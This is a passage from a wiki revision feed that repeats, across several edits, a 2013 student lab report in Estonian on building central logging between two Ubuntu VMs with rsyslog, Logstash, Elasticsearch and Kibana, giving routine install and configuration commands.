Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68984</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68984"/>
		<updated>2013-11-28T11:32:17Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Ülesande püstitus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;br /&gt;
&lt;br /&gt;
Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68983</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68983"/>
		<updated>2013-11-28T11:31:53Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;br /&gt;
&lt;br /&gt;
Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68982</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
